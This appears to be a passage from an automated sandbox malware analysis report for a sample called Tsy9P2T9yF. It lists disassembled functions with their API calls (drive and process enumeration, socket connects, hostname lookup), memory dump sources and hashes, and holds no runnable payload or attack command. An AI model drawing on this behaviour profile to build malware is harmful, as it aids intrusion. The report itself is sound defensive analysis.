                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: 7a06e6efdd740742127acf249e5e8bed5a2e24e8f3d5ad5463a6aaccbcfbf105
                                                              • Instruction ID: f9880850e7a63879280003b92cd6c7a47bd661d8f8c90aea8b9a5438b5e05eac
                                                              • Opcode Fuzzy Hash: 7a06e6efdd740742127acf249e5e8bed5a2e24e8f3d5ad5463a6aaccbcfbf105
                                                              • Instruction Fuzzy Hash: 21E1A0706043029BEB20CF24D885B6B7BA5FFC5310F148A28F99D9B291E775D944EB93
                                                              Function 07180000 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 309COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?), ref: 07180403
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494729956.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID: PR
                                                              • API String ID: 2623510744-2536945133
                                                              • Opcode ID: 757a1a5b48d3bc51e56fcd88edc5ab158f4a8e8304cde1a2d93095bc17748339
                                                              • Instruction ID: 23fddf99df02515d0b9fbcccaf7a131b48b2650679f903da2286691886a70096
                                                              • Opcode Fuzzy Hash: 757a1a5b48d3bc51e56fcd88edc5ab158f4a8e8304cde1a2d93095bc17748339
                                                              • Instruction Fuzzy Hash: 155114EB15C129BDB18AA5416F549FA6B2EE7DB730B32802BF807D2182F3C44E0D4931
                                                              Function 07140109 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 280COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: eb4bcd590eb9d04330c70538e6a356a53fef9dd03e69b4ff56b64abfc8c3978a
                                                              • Instruction ID: 54ba4754e61a9e5790a57867b08bb0a10e853aeb4de5bedbb443cd1110526e15
                                                              • Opcode Fuzzy Hash: eb4bcd590eb9d04330c70538e6a356a53fef9dd03e69b4ff56b64abfc8c3978a
                                                              • Instruction Fuzzy Hash: CA5134EB16C120BD624A91972B54AF66E7EE7CB730B3280BAF603C65C2E3D40F495171
                                                              Function 07140152 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 268COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 4b18fdd2ec61f32404e04aad29e12c9a96d1984985ab795b721e3d4e5b544a38
                                                              • Instruction ID: bc88623cc7a611cdc134e5b6a131593def7ec27c669d7e0d567d63a3d6a66a8e
                                                              • Opcode Fuzzy Hash: 4b18fdd2ec61f32404e04aad29e12c9a96d1984985ab795b721e3d4e5b544a38
                                                              • Instruction Fuzzy Hash: 5B5131EB168120BD610A91972B54AF66E7EE7CF730B3280B6F603C65C2E3980F4E5031
                                                              Function 07140146 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 254COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 99c7ca7c23f6c85b9211737a7dcaf0decc137e9e29d11a4e83923a45ae85cf5c
                                                              • Instruction ID: d1153a46b3a3dac459dc8674b37c42a20cd603998be289a9c6231c1b2f2e4e81
                                                              • Opcode Fuzzy Hash: 99c7ca7c23f6c85b9211737a7dcaf0decc137e9e29d11a4e83923a45ae85cf5c
                                                              • Instruction Fuzzy Hash: 5041F3EB16D120BD724A81872B54AFA6E7EE6CB730B3284B6F903C65C2E3940F4D5131
                                                              Function 0718010A Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 241COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?), ref: 07180403
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494729956.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID: PR
                                                              • API String ID: 2623510744-2536945133
                                                              • Opcode ID: 933cc1efbf8dfa054f2892e2e1ed07df89c54f487c381e0e004480802d9d50d7
                                                              • Instruction ID: fbfe2d36e4d4c580618c041739df6e1527d301021a4b8f22fbf72bff538e3f94
                                                              • Opcode Fuzzy Hash: 933cc1efbf8dfa054f2892e2e1ed07df89c54f487c381e0e004480802d9d50d7
                                                              • Instruction Fuzzy Hash: 0C5127FB15C219BDB18AA541AB549F76B6EE6DB330B328427F407D2582F3D44E0D8931
                                                              Function 07140186 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 221COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 5df9896babc5b10fe759c377ea7ad2e5ffe5eec80c0c83632f0983fbb74cbc88
                                                              • Instruction ID: edceb6125bb9b751189f4c388da3f607425eb88563a1cbc7198820902feb04e7
                                                              • Opcode Fuzzy Hash: 5df9896babc5b10fe759c377ea7ad2e5ffe5eec80c0c83632f0983fbb74cbc88
                                                              • Instruction Fuzzy Hash: D441C2EB16D121BD724A81972B54AF66E7EE6CB630B3284B6F907D55C2E3880F4D5031
                                                              Function 0714019B Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 216COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 6c8042a7d15feeb906fb925f7fe408cd6260ebd6811b4146d3ff2da2aa527b7e
                                                              • Instruction ID: eeab56f953b8020d75da802f1078b4c1c858f5577043da15ab2dcbc9ec1f948e
                                                              • Opcode Fuzzy Hash: 6c8042a7d15feeb906fb925f7fe408cd6260ebd6811b4146d3ff2da2aa527b7e
                                                              • Instruction Fuzzy Hash: 4541D2EB16D120BD724A81972B54AF66E7EE7CB630B3284BAF907D55C2E3980F4D5031
                                                              Function 07140219 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 215COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 3bab6ce40c4b7fc0052b318d649cec2e71a63ef30218d6c1bc94c205b5f90041
                                                              • Instruction ID: 0bd12003294efdbb2b122e7e5e11ef17ede846280cb522bc451571f3572cb53e
                                                              • Opcode Fuzzy Hash: 3bab6ce40c4b7fc0052b318d649cec2e71a63ef30218d6c1bc94c205b5f90041
                                                              • Instruction Fuzzy Hash: 2E41E4EB16D120BD724A81972B54AF66E7EE7CB630B3284B6F903D55C2E3980F4D5071
                                                              Function 071401A8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 4a87674a5505196c3c8c61bd057b8ed98823c1e1dd6b78f0563f38cecef8a92a
                                                              • Instruction ID: e1d9d9ab9b4da10f012925c062a6b6f639960d45b3d78340f280ba110837af8b
                                                              • Opcode Fuzzy Hash: 4a87674a5505196c3c8c61bd057b8ed98823c1e1dd6b78f0563f38cecef8a92a
                                                              • Instruction Fuzzy Hash: 8241D1EB16D120BD724A81972B54AF66E7EE6CB730B3284BAF907C55C2E3980F4D5071
                                                              Function 071401C5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: ae8e0fbb2ee74fda5437c1282bd6a70ad56e1fa4713f0f0a2448a3e164aaa245
                                                              • Instruction ID: 0404b7054e898c72dc3e4d56d68b5fd1032006ea70b24193ae674c943fb1441e
                                                              • Opcode Fuzzy Hash: ae8e0fbb2ee74fda5437c1282bd6a70ad56e1fa4713f0f0a2448a3e164aaa245
                                                              • Instruction Fuzzy Hash: 1D41E4EB16D120BD714A81972B54AF66E7EE6CB630B3284B6F907D59C2E3980F4D5031
                                                              Function 07140240 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 3e1ee43d75d7e221ea5db7d5c06d914a707820a6103b0db0187dc804746be95a
                                                              • Instruction ID: e81cb6e5b187e24cdbf9a5773c85257ff4b40527205297e83f2eaf5cd55baa1d
                                                              • Opcode Fuzzy Hash: 3e1ee43d75d7e221ea5db7d5c06d914a707820a6103b0db0187dc804746be95a
                                                              • Instruction Fuzzy Hash: F841E6EB16D120BD724A81972B54AF66E7DE6CB630B3284B7F507C55C2E3980F4D5071
                                                              Function 071401D6 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 206COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 6bd97b5b02861f46037f7a8160ae04f1e940e9b9f56ddf7f58a97d3a68a6ab1d
                                                              • Instruction ID: b670fe09613b59d756dc4693c8983dfe7510396c5bc3b8748ea8b51303196c38
                                                              • Opcode Fuzzy Hash: 6bd97b5b02861f46037f7a8160ae04f1e940e9b9f56ddf7f58a97d3a68a6ab1d
                                                              • Instruction Fuzzy Hash: D14106EB16D120BE724A81972754AF66E6DE7CB630B3284B6F903D55C2D3840F495031
                                                              Function 004BF7B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: CloseEvent
                                                              • String ID: multi.c
                                                              • API String ID: 2624557715-214371023
                                                              • Opcode ID: 4e3dd6d92b3e15fd86c7f732548bdb92752795fe6d1ea22583ab92cbe70a10d9
                                                              • Instruction ID: b3e15eadfc5d82b7c1e791329bf800d452dd50474b9c467c17ccf802f116bcba
                                                              • Opcode Fuzzy Hash: 4e3dd6d92b3e15fd86c7f732548bdb92752795fe6d1ea22583ab92cbe70a10d9
                                                              • Instruction Fuzzy Hash: C451E9B59007015BDB116A319C46BE776A8AF54318F08443AF88D9A253FB39E50D87BB
                                                              Function 07180297 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 162COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494729956.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PR
                                                              • API String ID: 0-2536945133
                                                              • Opcode ID: c9c3ccd1b4dd7b395f3246eb961cc100f51f72c1ec4805a9c20c77b0dc56941f
                                                              • Instruction ID: 2dd3cd1f44d18d0e260089aee3f821afe6809bd8c9b8d016091fdc566387eb92
                                                              • Opcode Fuzzy Hash: c9c3ccd1b4dd7b395f3246eb961cc100f51f72c1ec4805a9c20c77b0dc56941f
                                                              • Instruction Fuzzy Hash: EF3106F715C219BDB19AA541AF549FB6B2EE7DB630B368027F407D21C2E3D44A0D8931
                                                              Function 0718030D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?), ref: 07180403
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494729956.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID: PR
                                                              • API String ID: 2623510744-2536945133
                                                              • Opcode ID: e993288bb9c4b7d2206e1fd035f5ad7dde1a5827645e92e773169808c19673fb
                                                              • Instruction ID: 3819f3f359119cd00618a52584c6bfc19f54ead85c428c0793475d5047331db4
                                                              • Opcode Fuzzy Hash: e993288bb9c4b7d2206e1fd035f5ad7dde1a5827645e92e773169808c19673fb
                                                              • Instruction Fuzzy Hash: C22129F629C209BEA1D6A6519B549F7772EEAEB230336402BF407C1582E3C45A0D8931
                                                              Function 004B78B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
                                                              • Opcode ID: bc23f835aa92a117dad78c1eaec1de83584b6ecdebda143d7ba0fad60bfd755c
                                                              • Instruction ID: 20408cc167282be07627f4d76ec098e26c4d0d620438737f6db280fd7424c2ee
                                                              • Opcode Fuzzy Hash: bc23f835aa92a117dad78c1eaec1de83584b6ecdebda143d7ba0fad60bfd755c
                                                              • Instruction Fuzzy Hash: CDD05E2290A2206B85206599AC45C9B7AA8AEC6F60B06085DF88077204D2259C1183F3
                                                              Function 0057B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0057B29E,?,00000000,?,?), ref: 0057B0BA
                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00563C41,00000000), ref: 0057B0C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID:
                                                              • API String ID: 374722065-0
                                                              • Opcode ID: b515b450bdc2e1b802fcc9c0f2dffff589cdd1cff56ee186769c911f74a5e629
                                                              • Instruction ID: aed7dab7b4ec3a285f5bffa224d5e5e71e3efd99559740ccc5efd667a0eecc87
                                                              • Opcode Fuzzy Hash: b515b450bdc2e1b802fcc9c0f2dffff589cdd1cff56ee186769c911f74a5e629
                                                              • Instruction Fuzzy Hash: E601D8362042009FEA205A68EC88F6BBBA9FF89364F044B54F97C931E1D726ED50A751
                                                              Function 07140207 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 24411247e48f99ab7119935c68c1c7ca7024309451620a255907da23651828e0
                                                              • Instruction ID: 7db7ad17a47aa1118f60983316470432935b5a4b99f0ba780b02dbeb996f2663
                                                              • Opcode Fuzzy Hash: 24411247e48f99ab7119935c68c1c7ca7024309451620a255907da23651828e0
                                                              • Instruction Fuzzy Hash: D431D5EB16D120BE714A81572B14AF66E7DE7CB630B3284BAF907C65C2E3880F4D5031
                                                              Function 07140266 Relevance: 1.7, APIs: 1, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 07140328
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1494645309.0000000007140000.00000040.00001000.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7140000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: d29efb6b437f92b5ec3ff242c9d27aee3ebb450884ca7def59d31400a8aab8b0
                                                              • Instruction ID: 891c441a4b9953b8ac7765d4015a3361ca1d5f687d1869ab3015849e4e9ae2dd
                                                              • Opcode Fuzzy Hash: d29efb6b437f92b5ec3ff242c9d27aee3ebb450884ca7def59d31400a8aab8b0
                                                              • Instruction Fuzzy Hash: 4831C4EB169121BE624A81572754AF66E7EE7CF630B3284B6F907C55C2E3980F495031
                                                              Function 00564950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 00564AA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: b6e831aaf2b1824493647b232ebbb7144dc13d896b6884b22dc3bc54fb3780d3
                                                              • Instruction ID: 52ba10bb50a8e820b027d978f0cf018cd90d0645a1afcda1eea60bba8fd2c1af
                                                              • Opcode Fuzzy Hash: b6e831aaf2b1824493647b232ebbb7144dc13d896b6884b22dc3bc54fb3780d3
                                                              • Instruction Fuzzy Hash: 4051DF706047019BEB309B69DD497277EE4BF41319F14193CE98A8B6E1EB75E884CF02
